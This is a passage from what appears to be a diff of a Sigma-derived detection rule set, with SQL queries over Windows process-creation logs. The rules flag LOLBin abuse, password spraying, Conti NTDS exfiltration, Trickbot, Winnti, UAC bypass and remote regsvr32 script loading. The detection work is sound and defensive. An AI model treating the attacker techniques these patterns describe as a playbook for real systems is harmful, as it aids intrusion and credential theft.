Kits\\\\10\\\\bin\\\\10.0.22000.0\\\\x64%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows Kits\\\\10\\\\bin\\\\10.0.19041.0\\\\x64%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows Kits\\\\10\\\\bin\\\\10.0.17763.0\\\\x64%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\sc.exe' ESCAPE '\\' OR OriginalFileName = 'sc.exe') AND (CommandLine LIKE '%sdset%' ESCAPE '\\' AND CommandLine LIKE '%A;%' ESCAPE '\\') AND (CommandLine LIKE '%;IU%' ESCAPE '\\' OR CommandLine LIKE '%;SU%' ESCAPE '\\' OR CommandLine LIKE '%;BA%' ESCAPE '\\' OR CommandLine LIKE '%;SY%' ESCAPE '\\' OR CommandLine LIKE '%;WD%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_regsvr32_registration_via_cscript.yml" + "filename": "proc_creation_win_sc_sdset_allow_service_changes.yml" }, { - "title": "MpiExec Lolbin", - "id": "729ce0ea-5d8f-4769-9762-e35de441586d", - "status": "test", - "description": "Detects a certain command line flag combination used by mpiexec.exe LOLBIN from HPC pack that can be used to execute any other binary", - "author": "Florian Roth (Nextron Systems)", + "title": "Potential Password Spraying Attempt Using Dsacls.EXE", + "id": "bac9fb54-2da7-44e9-988f-11e9a5edbc0c", + "status": "experimental", + "description": "Detects possible password spraying attempts using Dsacls", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.execution", - "attack.defense_evasion", "attack.t1218" ], "falsepositives": [ - "Unknown" + "Legitimate use of dsacls to bind to an LDAP session" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\mpiexec.exe' ESCAPE '\\' OR Imphash = 'd8b52ef6aaa3a81501bdfff9dbb96217' OR Hashes LIKE '%IMPHASH=d8b52ef6aaa3a81501bdfff9dbb96217%' ESCAPE '\\') AND (CommandLine LIKE '% /n 1 %' ESCAPE '\\' OR CommandLine LIKE '% -n 1 %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\dsacls.exe' ESCAPE '\\' OR OriginalFileName = 'DSACLS.EXE') AND (CommandLine LIKE '%/user:%' ESCAPE '\\' AND CommandLine LIKE '%/passwd:%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_mpiexec.yml" + "filename": "proc_creation_win_dsacls_password_spray.yml" }, { - "title": "Domain Trust Discovery Via Dsquery", - "id": "3bad990e-4848-4a78-9530-b427d854aac0", - "status": "test", - "description": "Detects execution of \"dsquery.exe\" for domain trust discovery", - "author": "E.M. Anhaus, Tony Lambert, oscd.community, omkar72", + "title": "WmiPrvSE Spawned A Process", + "id": "d21374ff-f574-44a7-9998-4a8c8bf33d7d", + "status": "stable", + "description": "Detects WmiPrvSE spawning a process", + "author": "Roberto Rodriguez @Cyb3rWard0g", + "tags": [ + "attack.execution", + "attack.t1047" + ], + "falsepositives": [ + "False positives are expected (e.g. in environments where WinRM is used legitimately)" + ], + "level": "medium", + "rule": [ + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ParentProcessName LIKE '%\\\\WmiPrvSe.exe' ESCAPE '\\' AND NOT ((SubjectLogonId IN ('0x3e7', 'null')) OR ((User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')) OR (NewProcessName LIKE '%\\\\WmiPrvSE.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\WerFault.exe' ESCAPE '\\') OR (SubjectLogonId = '')))" + ], + "filename": "proc_creation_win_wmiprvse_spawning_process.yml" + }, + { + "title": "PUA - Advanced Port Scanner Execution", + "id": "54773c5f-f1cc-4703-9126-2f797d96a69d", + "status": "experimental", + "description": "Detects the use of Advanced Port Scanner.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.discovery", - "attack.t1482" + "attack.t1046", + "attack.t1135" ], "falsepositives": [ - "Legitimate use of the utilities by legitimate user for legitimate reason" + "Legitimate administrative use", + "Tools with similar commandline (very rare)" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\dsquery.exe' ESCAPE '\\' OR OriginalFileName = 'dsquery.exe') AND CommandLine LIKE '%trustedDomain%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\advanced\\_port\\_scanner%' ESCAPE '\\' OR OriginalFileName LIKE '%advanced\\_port\\_scanner%' ESCAPE '\\' OR Description LIKE '%Advanced Port Scanner%' ESCAPE '\\') OR (CommandLine LIKE '%/portable%' ESCAPE '\\' AND CommandLine LIKE '%/lng%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_dsquery_domain_trust_discovery.yml" + "filename": "proc_creation_win_pua_advanced_port_scanner.yml" }, { - "title": "Potential Privilege Escalation via Service Permissions Weakness", - "id": "0f9c21f1-6a73-4b0e-9809-cb562cb8d981", + "title": "Esentutl Gather Credentials", + "id": "7df1713a-1a5b-4a4b-a071-dc83b144a101", "status": "test", - "description": "Detect modification of services configuration (ImagePath, FailureCommand and ServiceDLL) in registry by processes with Medium integrity level", - "author": "Teymur Kheirkhabarov", + "description": "Conti recommendation to its affiliates to use esentutl to access NTDS dumped file. Trickbot also uses this utilities to get MSEdge info via its module pwgrab.", + "author": "sam0x90", "tags": [ - "attack.privilege_escalation", - "attack.t1574.011" + "attack.credential_access", + "attack.t1003", + "attack.t1003.003" ], "falsepositives": [ - "Unknown" + "To be determined" + ], + "level": "medium", + "rule": [ + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%esentutl%' ESCAPE '\\' AND CommandLine LIKE '% /p%' ESCAPE '\\')" + ], + "filename": "proc_creation_win_esentutl_params.yml" + }, + { + "title": "PUA - CleanWipe Execution", + "id": "f44800ac-38ec-471f-936e-3fa7d9c53100", + "status": "experimental", + "description": "Detects the use of CleanWipe a tool usually used to delete Symantec antivirus.", + "author": "Nasreddine Bencherchali (Nextron Systems)", + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ], + "falsepositives": [ + "Legitimate administrative use (Should be investigated either way)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND IntegrityLevel = 'Medium' AND CommandLine LIKE '%ControlSet%' ESCAPE '\\' AND CommandLine LIKE '%services%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\ImagePath%' ESCAPE '\\' OR CommandLine LIKE '%\\\\FailureCommand%' ESCAPE '\\' OR CommandLine LIKE '%\\\\ServiceDll%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\SepRemovalToolNative\\_x64.exe' ESCAPE '\\' OR (NewProcessName LIKE '%\\\\CATClean.exe' ESCAPE '\\' AND CommandLine LIKE '%--uninstall%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\NetInstaller.exe' ESCAPE '\\' AND CommandLine LIKE '%-r%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\WFPUnins.exe' ESCAPE '\\' AND CommandLine LIKE '%/uninstall%' ESCAPE '\\' AND CommandLine LIKE '%/enterprise%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_registry_privilege_escalation_via_service_key.yml" + "filename": "proc_creation_win_pua_cleanwipe.yml" }, { - "title": "PsExec Service Execution", - "id": "fdfcbd78-48f1-4a4b-90ac-d82241e368c5", + "title": "Potential CVE-2023-21554 QueueJumper Exploitation", + "id": "53207cc2-0745-4c19-bc72-80be1cc16b3f", "status": "experimental", - "description": "Detects launch of the PSEXESVC service, which means that this system was the target of a psexec remote execution", - "author": "Thomas Patzke, Romaissa Adjailia, Florian Roth (Nextron Systems)", + "description": "Detects potential exploitation of CVE-2023-21554 (dubbed QueueJumper)", + "author": "Nasreddine Bencherchali (Nextron Systems)", + "falsepositives": [ + "Unknown" + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\Windows\\\\System32\\\\mqsvc.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wsl.exe' ESCAPE '\\'))" + ], + "filename": "proc_creation_win_exploit_cve_2023_21554_queuejumper.yml" + }, + { + "title": "Always Install Elevated MSI Spawned Cmd And Powershell", + "id": "1e53dd56-8d83-4eb4-a43e-b790a05510aa", + "status": "test", + "description": "Detects Windows Installer service (msiexec.exe) spawning \"cmd\" or \"powershell\"", + "author": "Teymur Kheirkhabarov (idea), Mangatas Tondang (rule), oscd.community", "tags": [ - "attack.execution" + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ - "Legitimate administrative tasks" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE 'C:\\\\Windows\\\\PSEXESVC.exe' ESCAPE '\\' OR OriginalFileName = 'psexesvc.exe'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('Cmd.Exe', 'PowerShell.EXE', 'pwsh.dll')) AND (ParentProcessName LIKE '%\\\\Windows\\\\Installer\\\\%' ESCAPE '\\' AND ParentProcessName LIKE '%msi%' ESCAPE '\\' AND ParentProcessName LIKE '%tmp' ESCAPE '\\'))" ], - "filename": "proc_creation_win_sysinternals_psexesvc.yml" + "filename": "proc_creation_win_susp_elavated_msi_spawned_shell.yml" }, { - "title": "Devtoolslauncher.exe Executes Specified Binary", - "id": "cc268ac1-42d9-40fd-9ed3-8c4e1a5b87e6", - "status": "test", - "description": "The Devtoolslauncher.exe executes other binary", - "author": "Beyu Denis, oscd.community (rule), @_felamos (idea)", + "title": "Firewall Rule Deleted Via Netsh.EXE", + "id": "1a5fefe6-734f-452e-a07d-fc1c35bce4b2", + "status": "experimental", + "description": "Detects the removal of a port or application rule in the Windows Firewall configuration using netsh", + "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1218" + "attack.t1562.004" ], "falsepositives": [ - "Legitimate use of devtoolslauncher.exe by legitimate user" + "Legitimate administration activity", + "Software installations and removal" + ], + "level": "medium", + "rule": [ + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\netsh.exe' ESCAPE '\\' OR OriginalFileName = 'netsh.exe') AND (CommandLine LIKE '%firewall%' ESCAPE '\\' AND CommandLine LIKE '%delete %' ESCAPE '\\')) AND NOT (ParentProcessName LIKE '%\\\\Dropbox.exe' ESCAPE '\\' AND CommandLine LIKE '%name=Dropbox%' ESCAPE '\\'))" + ], + "filename": "proc_creation_win_netsh_fw_delete_rule.yml" + }, + { + "title": "Adwind RAT / JRAT", + "id": "1fac1481-2dbc-48b2-9096-753c49b4ec71", + "status": "test", + "description": "Detects javaw.exe in AppData folder as used by Adwind / JRAT", + "author": "Florian Roth (Nextron Systems), Tom Ueltschi, Jonhnathan Ribeiro, oscd.community", + "tags": [ + "attack.execution", + "attack.t1059.005", + "attack.t1059.007" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\devtoolslauncher.exe' ESCAPE '\\' AND CommandLine LIKE '%LaunchForDeploy%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%\\\\AppData\\\\Roaming\\\\Oracle%' ESCAPE '\\' AND CommandLine LIKE '%\\\\java%' ESCAPE '\\' AND CommandLine LIKE '%.exe %' ESCAPE '\\') OR (CommandLine LIKE '%cscript.exe%' ESCAPE '\\' AND CommandLine LIKE '%Retrive%' ESCAPE '\\' AND CommandLine LIKE '%.vbs %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_lolbin_devtoolslauncher.yml" + "filename": "proc_creation_win_malware_adwind.yml" }, { - "title": "Abuse of Service Permissions to Hide Services Via Set-Service", - "id": "514e4c3a-c77d-4cde-a00f-046425e2301e", + "title": "Uncommon One Time Only Scheduled Task At 00:00", + "id": "970823b7-273b-460a-8afc-3a6811998529", "status": "experimental", - "description": "Detects usage of the \"Set-Service\" powershell cmdlet to configure a new SecurityDescriptor that allows a service to be hidden from other utilities such as \"sc.exe\", \"Get-Service\"...etc. (Works only in powershell 7)", - "author": "Nasreddine Bencherchali (Nextron Systems)", - "tags": [ - "attack.persistence", - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1574.011" - ], + "description": "Detects scheduled task creation events that include suspicious actions, and is run once at 00:00", + "author": "pH-T (Nextron Systems)", "falsepositives": [ - "Rare intended use of hidden services" + "Software installation" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR OriginalFileName = 'pwsh.dll') AND (CommandLine LIKE '%Set-Service %' ESCAPE '\\' AND CommandLine LIKE '%DCLCWPDTSD%' ESCAPE '\\') AND (CommandLine LIKE '%-SecurityDescriptorSddl %' ESCAPE '\\' OR CommandLine LIKE '%-sd %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\schtasks.exe%' ESCAPE '\\' OR OriginalFileName = 'schtasks.exe') AND (CommandLine LIKE '%wscript%' ESCAPE '\\' OR CommandLine LIKE '%vbscript%' ESCAPE '\\' OR CommandLine LIKE '%cscript%' ESCAPE '\\' OR CommandLine LIKE '%wmic %' ESCAPE '\\' OR CommandLine LIKE '%wmic.exe%' ESCAPE '\\' OR CommandLine LIKE '%regsvr32.exe%' ESCAPE '\\' OR CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\%' ESCAPE '\\') AND (CommandLine LIKE '%once%' ESCAPE '\\' AND CommandLine LIKE '%00:00%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_hide_services_via_set_service.yml" + "filename": "proc_creation_win_schtasks_one_time_only_midnight_task.yml" }, { - "title": "PUA - 3Proxy Execution", - "id": "f38a82d2-fba3-4781-b549-525efbec8506", - "status": "experimental", - "description": "Detects the use of 3proxy, a tiny free proxy server", + "title": "Trickbot Malware Activity", + "id": "58bf96d9-ff5f-44bd-8dcc-1c4f79bf3a27", + "status": "stable", + "description": "Detects Trickbot malware process tree pattern in which \"rundll32.exe\" is a parent of \"wermgr.exe\"", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1572" + "attack.execution", + "attack.t1559" ], "falsepositives": [ - "Administrative activity" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\3proxy.exe' ESCAPE '\\' OR Description = '3proxy - tiny proxy server' OR CommandLine LIKE '%.exe -i127.0.0.1 -p%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\wermgr.exe' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%DllRegisterServer%' ESCAPE '\\')" ], - "filename": "proc_creation_win_pua_3proxy_execution.yml" + "filename": "proc_creation_win_malware_trickbot_wermgr.yml" }, { - "title": "Remote Access Tool - LogMeIn Execution", - "id": "d85873ef-a0f8-4c48-a53a-6b621f11729d", + "title": "Suspicious JavaScript Execution Via Mshta.EXE", + "id": "67f113fa-e23d-4271-befa-30113b3e08b1", "status": "test", - "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\n", - "author": "frack113", + "description": "Detects execution of javascript code using \"mshta.exe\".", + "author": "E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community", "tags": [ - "attack.command_and_control", - "attack.t1219" + "attack.defense_evasion", + "attack.t1218.005" ], "falsepositives": [ - "Legitimate use" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Description = 'LMIGuardianSvc' OR Product = 'LMIGuardianSvc' OR Company = 'LogMeIn, Inc.'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR OriginalFileName = 'MSHTA.EXE') AND CommandLine LIKE '%javascript%' ESCAPE '\\')" ], - "filename": "proc_creation_win_remote_access_tools_logmein.yml" + "filename": "proc_creation_win_mshta_javascript.yml" }, { - "title": "UAC Bypass Using Event Viewer RecentViews", - "id": "30fc8de7-d833-40c4-96b6-28319fbc4f6c", + "title": "HackTool - RedMimicry Winnti Playbook Execution", + "id": "95022b85-ff2a-49fa-939a-d7b8f56eeb9b", "status": "test", - "description": "Detects the pattern of UAC Bypass using Event Viewer RecentViews", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects actions caused by the RedMimicry Winnti playbook a automated breach emulations utility", + "author": "Alexander Rausch", "tags": [ + "attack.execution", "attack.defense_evasion", - "attack.privilege_escalation" + "attack.t1106", + "attack.t1059.003", + "attack.t1218.011" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%\\\\Event Viewer\\\\RecentViews%' ESCAPE '\\' OR CommandLine LIKE '%\\\\EventV~1\\\\RecentViews%' ESCAPE '\\') AND CommandLine LIKE '%>%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\') AND (CommandLine LIKE '%gthread-3.6.dll%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Temp\\\\tmp.bat%' ESCAPE '\\' OR CommandLine LIKE '%sigcmm-2.4.dll%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_uac_bypass_eventvwr_recentviews.yml" + "filename": "proc_creation_win_hktl_redmimicry_winnti_playbook.yml" }, { - "title": "Winnti Malware HK University Campaign", - "id": "3121461b-5aa0-4a41-b910-66d25524edbb", + "title": "Conti NTDS Exfiltration Command", + "id": "aa92fd02-09f2-48b0-8a93-864813fb8f41", "status": "test", - "description": "Detects specific process characteristics of Winnti malware noticed in Dec/Jan 2020 in a campaign against Honk Kong universities", - "author": "Florian Roth (Nextron Systems), Markus Neis", + "description": "Detects a command used by conti to exfiltrate NTDS", + "author": "Max Altgelt (Nextron Systems), Tobias Michalski (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1574.002", - "attack.g0044" + "attack.collection", + "attack.t1560" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((ParentProcessName LIKE '%C:\\\\Windows\\\\Temp%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\hpqhvind.exe%' ESCAPE '\\') AND NewProcessName LIKE 'C:\\\\ProgramData\\\\DRM%' ESCAPE '\\') OR (ParentProcessName LIKE 'C:\\\\ProgramData\\\\DRM%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\wmplayer.exe' ESCAPE '\\') OR (ParentProcessName LIKE '%\\\\Test.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\wmplayer.exe' ESCAPE '\\') OR NewProcessName LIKE 'C:\\\\ProgramData\\\\DRM\\\\CLR\\\\CLR.exe' ESCAPE '\\' OR (ParentProcessName LIKE 'C:\\\\ProgramData\\\\DRM\\\\Windows%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\SearchFilterHost.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%7za.exe%' ESCAPE '\\' AND CommandLine LIKE '%\\\\C$\\\\temp\\\\log.zip%' ESCAPE '\\')" ], - "filename": "proc_creation_win_apt_winnti_mal_hk_jan20.yml" + "filename": "proc_creation_win_malware_conti_7zip.yml" }, { - "title": "Rundll32 InstallScreenSaver Execution", - "id": "15bd98ea-55f4-4d37-b09a-e7caa0fa2221", - "status": "experimental", - "description": "An attacker may execute an application as a SCR File using rundll32.exe desk.cpl,InstallScreenSaver", - "author": "Christopher Peacock @securepeacock, SCYTHE @scythe_io, TactiKoolSec", + "title": "Tor Client/Browser Execution", + "id": "62f7c9bf-9135-49b2-8aeb-1e54a6ecc13c", + "status": "test", + "description": "Detects the use of Tor or Tor-Browser to connect to onion routing networks", + "author": "frack113", "tags": [ - "attack.t1218.011", - "attack.defense_evasion" + "attack.command_and_control", + "attack.t1090.003" ], "falsepositives": [ - "Legitimate installation of a new screensaver" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND CommandLine LIKE '%InstallScreenSaver%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (NewProcessName LIKE '%\\\\tor.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Tor Browser\\\\Browser\\\\firefox.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_rundll32_installscreensaver.yml" + "filename": "proc_creation_win_browsers_tor_execution.yml" }, { - "title": "Compress Data and Lock With Password for Exfiltration With WINZIP", - "id": "e2e80da2-8c66-4e00-ae3c-2eebd29f6b6d", + "title": "Possible Shim Database Persistence via sdbinst.exe", + "id": "517490a7-115a-48c6-8862-1a481504d5a8", "status": "test", - "description": "An adversary may compress or encrypt data that is collected prior to exfiltration using 3rd party utilities", - "author": "frack113", + "description": "Detects installation of a new shim using sdbinst.exe. A shim can be used to load malicious DLLs into applications.", + "author": "Markus Neis", "tags": [ - "attack.collection", - "attack.t1560.001" + "attack.persistence", + "attack.privilege_escalation", + "attack.t1546.011" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%winzip.exe%' ESCAPE '\\' OR CommandLine LIKE '%winzip64.exe%' ESCAPE '\\') AND CommandLine LIKE '%-s\"%' ESCAPE '\\' AND (CommandLine LIKE '% -min %' ESCAPE '\\' OR CommandLine LIKE '% -a %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\sdbinst.exe' ESCAPE '\\' AND CommandLine LIKE '%.sdb%' ESCAPE '\\') AND NOT (CommandLine LIKE '%iisexpressshim.sdb%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_winzip_password_compression.yml" + "filename": "proc_creation_win_sdbinst_shim_persistence.yml" }, { - "title": "Remote Access Tool - Anydesk Execution From Suspicious Folder", - "id": "065b00ca-5d5c-4557-ac95-64a6d0b64d86", + "title": "Suspicious Mshta.EXE Execution Patterns", + "id": "e32f92d1-523e-49c3-9374-bdb13b46a3ba", "status": "experimental", - "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\n", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects suspicious mshta process execution patterns", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1219" + "attack.execution", + "attack.t1106" ], "falsepositives": [ - "Legitimate use of AnyDesk from a non-standard folder" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\AnyDesk.exe' ESCAPE '\\' OR Description = 'AnyDesk' OR Product = 'AnyDesk' OR Company = 'AnyDesk Software GmbH') AND NOT ((NewProcessName LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%Program Files (x86)\\\\AnyDesk%' ESCAPE '\\' OR NewProcessName LIKE '%Program Files\\\\AnyDesk%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR OriginalFileName = 'MSHTA.EXE') AND ((ParentProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\') AND (CommandLine LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\'))) OR ((NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR OriginalFileName = 'MSHTA.EXE') AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%.htm%' ESCAPE '\\' OR CommandLine LIKE '%.hta%' ESCAPE '\\') OR (CommandLine LIKE '%mshta.exe' ESCAPE '\\' OR CommandLine LIKE '%mshta' ESCAPE '\\')))))" ], - "filename": "proc_creation_win_remote_access_tools_anydesk_susp_exec.yml" + "filename": "proc_creation_win_mshta_susp_pattern.yml" }, { - "title": "Suspicious RDP Redirect Using TSCON", - "id": "f72aa3e8-49f9-4c7d-bd74-f8ab84ff9bbb", + "title": "Regsvr32 Anomaly", + "id": "8e2b24c9-4add-46a0-b4bb-0057b4e6187d", + "status": "experimental", + "description": "Detects various anomalies in relation to regsvr32.exe", + "author": "Florian Roth (Nextron Systems), oscd.community, Tim Shelton", + "tags": [ + "attack.defense_evasion", + "attack.t1218.010", + "car.2019-04-002", + "car.2019-04-003" + ], + "falsepositives": [ + "Unknown" + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND CommandLine LIKE '%\\\\Temp\\\\%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND (ParentProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\')) OR (NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND CommandLine LIKE '%/i:%' ESCAPE '\\' AND CommandLine LIKE '%http%' ESCAPE '\\' AND CommandLine LIKE '%scrobj.dll' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND CommandLine LIKE '%/i:%' ESCAPE '\\' AND CommandLine LIKE '%ftp%' ESCAPE '\\' AND CommandLine LIKE '%scrobj.dll' ESCAPE '\\') OR ((NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\') AND ParentProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\EXCEL.EXE' ESCAPE '\\' AND CommandLine LIKE 